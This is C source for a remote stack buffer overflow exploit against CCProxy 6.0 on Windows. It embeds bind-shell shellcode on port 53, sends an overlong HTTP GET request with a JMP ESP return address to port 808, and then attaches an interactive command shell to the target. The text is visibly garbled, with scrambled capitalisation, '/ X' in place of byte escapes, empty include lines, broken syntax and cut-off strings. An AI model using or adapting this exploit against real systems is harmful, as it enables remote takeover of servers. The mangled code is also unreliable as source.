/ *
* ccpx.c - x86 / win32 ccproxy 6.0 Remote Stack Buffer overflow Exploit
* Author: ISNO
* COMPLIE: CL CCPX.c
* Usage: ccpx
* Default Target_Port is 808
* Stronger by goldsun 5261314@sohu.com
* /
#include
#include
#include
#include
#pragma comment (Lib, "WS2_32")
#define pport 808
#define xport 53
// Lion's Shellcode Bind Port 53
Unsigned char shellcode [] =
"/ XEB / X10 / X5A / X4A / X33 / XC9 / X66 / XB9 / X7D / X01 / X80 / X34 / X0A / X99 / XE2 / XFA"
"/ Xeb / X05 / XE8 / XEB / XFF / XFF / XFF"
// shellcode
"/ x70 / x99 / xc3 / xfd / x38 / xa9 / x99 / x99 / x99 / x12 / xd9 / x95 / x12"
"/ XE9 / X85 / X91 / X12 / XD9 / X12 / XEA / XA5 / X12 / XED / X87 / XE1 / X9A"
"/ X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6"
"/ X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED / X91 / XC0 / XC6 / X1A / X5E / X9D"
"/ xdc / x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf / xbd / x9a / x5a / x48 / x78 / x9a"
"/ X58 / XAA / X50 / XDF / X1 / X9A / X5A / X58 / X78 / X9B / X9A / X58"
"/ X12 / X99 / X9A / X5A / X12 / X63 / X12 / X6E / X1A / X5F / X97 / X12 / X49 / XF3 / X9A / XC0"
"/ x71 / x1e / x99 / x99 / x99 / x1a / x5f / x94 / xcb / xcf / x66 / xce / x65 / xc3 / x12 / x41"
"/ Xf3 / X9C / XC0 / X71 / XED / X99 / X99 / X99 / XC9 / XC9 / XC9 / XC9 / XF3 / X98 / XF3 / X9B"
"/ X66 / XCE / X75 / X12 / X41 / X99 / X9E / XAC / XAA / X59 / X10 / XDE / X9D"
"/ XF3 / X89 / XCE / XCA / X66 / XCE / X69 / XF3 / X98 / XCA / X66 / XCE / X6D / XC9 / XC9 / XCA"
"/ x66 / xcE / x61 / x12 / x49 / x1a / x75 / xdd / x12 / x6d / xaa / x59 / xf3 / x89 / xc0 / x10"
"/ x9d / x17 / x7b / x62 / x10 / xcf / xa1 / x10 / xcf / xa5 / x10 / xcf / xd9 / xff / x5e / xdf"
"/ xb5 / x98 / x98 / x14 / xde / x89 / xc9 / xcf / xaa / x50 / xc8 / xc8 / xc8 / xf3 / x98 / xc8"
"/ XC8 / X5E / XDE / XA5 / XFA / XF4 / XDE / XA5 / XC9 / XC8 / X66 / XCE / X79" "/ XCB / X66 / XCE / X65 / XCA / X66 / XCE / X65 / XC9 / X66 / XCE / X7D / XAA / X59 "
"/ x35" // port
"/ X1C / X59 / Xec / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59"
"/ x5a / x71 / x76 / x67 / x66 / x66 / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / xfd / xfd"
"/ XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC / XF8 / XED / XFC / XC9 / XEB / XF6 / XFA / XFC"
"/ XEA / XEA / XD8 / X99 / XDC / XE1 / XF0 / XED / XCD / XF1 / XEB / XFC / XF8 / XFD / X99 / XD5"
"/ XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB / XF8 / XEB / XE0 / XD8 / X99 / XEE / XEA / XAB / XC6"
"/ XAA / XAb / X99 / XCE / XCA / XD8 / XCA / XF6 / XFA / XF2 / XFC / XED / XD8 / X99 / XFB / XF0"
"/ XF7 / XFD / X99 / XF5 / XF0 / XEA / XED / XFC / XF7 / X99 / XF8 / XFA / XFA / XFC / XE9 / XED"
"/ x99 / xfa / xf5 / xf6 / xea / xfc / xea / xf6 / xfa / xf2 / xfc / xed / x99";
INT Make_Connection (Char * Address, Int port, int Timeout);
Void shell (int SHELL (INT SOCK);
Int main (int Argc, char * argv [])
{
Socket CSOCK, S2;
Wsadata wsadata;
Int Yn, Offset, RET, PPORT
Char line [80];
Char BUF [8000], SBUF [10000];
CHAR LOCAL [100] = {0};
Char * localip;
Struct Hostent * Phost;
IF (Argc <2)
{
Printf ("CCProxy 6 Exploccus.org & Compiled By Goldsun / N");
Printf ("USAGE:% s
Return 1;
}
IF (argc> = 3)
Pport = ATOI (Argv [2]);
Else
Pport = pport;
IF (argc> = 4) OFFSET = ATOI (Argv [3]);
IF (WsaStartup (MakeWord (1, 1), & WSADATA)! = 0)
{
Printf ("[-] WSAStartup Failed./N");
WSACLEANUP ();
Exit (1);
}
// Get this name
Gethostname (CHAR *) LOCAL, SIZEOF (Local) -1);
/ / Get local IP addresses
Phost = gethostByname ((char *) local);
Localip = inet_ntoa (* (in_addr *) phost-> h_addr_list [0]);
// offset = 15-strlen (localip); // offset from target_ip len retdroffset = 2;
Printf ("Local IP:% s Target IP:% S:% D / N", localip, argv [1], pport);
PRINTF ("Target in The Same Subnet? [Y / N]");
Yn = _Getch ();
IF (Yn == 0x6e || yn == 0x4e)
{
PRINTF ("/ R / NHAVE REAL INTERNET IP Address? [Y / N]");
Yn = _Getch ();
IF (Yn == 0x6e || yn == 0x4e)
{
Printf ("/ R / NYOUR GATEWAY Internet IP Address:");
Gets (line);
OFFSET = 15-Strlen (Line);
}
}
// If the attack target is the local address, you need to adjust the OFFSET.
IF (strcmp (argv [1], "localhost") == 0 || StrCMP (Argv [1], "127.0.0.1") == 0)
//offset=15-strlen ("127.0.0.1 ");
OFFSET = 6;
Printf ("/ R / N [ ] Connecting TO% S:% D / N", Argv [1], PPORT);
Csock = make_connection (Argv [1], PPort, 10);
IF (CSOCK <0)
{
Printf ("[-] connection err./n");
Exit (1);
}
Printf ("Offset:% D", OFFSET;
MEMSET (BUF, 0, SIZEOF (BUF) -1);
MEMSET (BUF, 0x41, 4045 offset);
Memcpy (buf strlen (buf) -strlen (shellcode), shellcode, strlen (shellcode);
Printf ("Magic Length:% D 16 =", Strlen (BUF));
STRCAT (BUF, "/ XCD / X54 / XFA / X7F"); // Ret AddR JMP ESP
STRCAT (BUF, "/ XB9 / X41 / X41 / X41 / X25 / XC1 / XE9 / X14 / X2B / XE1 / XFF / XE4"); // JMP Back
Sprintf (SBUF, "Get /% S HTTP / 1.0 / R / N / R / N", BUF);
Printf ("Buffer Length:% D / N", Strlen (BUF));
Printf ("[ ] Send Magic Buffer ... / N");
RET = Send (CSOCK, SBUF, Strlen (SBUF), 0);
IF (RET <= 0)
{
Printf ("[-] Send Err./N");
Exit (1);
}
CloseSocket (CSOCK);
Sleep (1000);
Printf ("[ ] Connecting to cmd shell port ... / n");
S2 = make_connection (Argv [1], Xport, 10);
IF (S2 <0)
{
Printf ("[-] Connect Err: - } Shell (S2); WSACLEANUP (); Return 0; } // Analyze the domain name Unsigned int resolve (char * name) { Struct hostent * he; UNSIGNED INT IP; IF ((ip = inet_addr (name)) == (- 1)) { IF ((He = gethostByname (Name)) == 0) Return 0; Memcpy (& IP, He-> H_ADDR, 4); } Return IP; } // Establish a TCP connection // Enter: // char * Address IP address // int port port // int Timeout delay // Output: // Return: // Success> 0 // error <= 0 INT Make_Connection (Char * Address, Int port, int Timeout) { Struct SockAddr_in Target; Socket S; INT I; DWORD BF; FD_SET WD; Struct TimeVal TV; S = Socket (AF_INET, SOCK_STREAM, 0); IF (s <0) Return -1; Target.sin_family = AF_INET; Target.sin_addr.s_addr = resolve (address); IF (target.sin_addr.s_addr == 0) { CloseSocket (s); Return -2; } Target.sin_port = htons (port); BF = 1; IOCTLSocket (S, Fionbio, & bf); TV.TV_SEC = Timeout; TV.TV_USEC = 0; FD_ZERO (& WD); FD_SET (S, & WD); Connect (S, Struct SockAddr *) & Target, Sizeof (Target); IF ((i = SELECT (S 1, 0, & WD, 0, & TV)) == (- 1)) { CloseSocket (s); Return -3; } IF (i == 0) { CloseSocket (s); Return-4; } i = sizeof (int); GetSockopt (S, SOL_Socket, SO_ERROR, (CHAR *) & bf, & i); IF ((bf! = 0) || (i! = sizeof (int)))))) { CloseSocket (s); Return -5; } IOCTLSocket (S, Fionbio, & bf); Return S; } / * ripped from test and modifed by EY4S for Win32 * / Void shell (int SHELL) { Int L; Char BUF [512]; Struct TimeVal Time; Unsigned long ul [2]; TIME.TV_SEC = 1; TIME.TV_USEC = 0; While (1) { UL [0] = 1; UL [1] = SOCK; L = SELECT (0, (fd_set *) & UL, NULL, NULL, & TIME); if (l == 1) { L = RECV (Sock, BUF, SIZEOF (BUF), 0); IF (l <= 0) { Printf ("[-] connection closed./N"); Return; } L = Write (1, BUF, L); IF (l <= 0) { Printf ("[-] connection closed./N"); Return; } } Else { L = read (0, buf, sizeof (buf)); IF (l <= 0) { Printf ("[-] connection closed./N"); Return; } L = Send (SOCK, BUF, L, 0); IF (l <= 0) { Printf ("[-] connection closed./N"); Return; } } } }
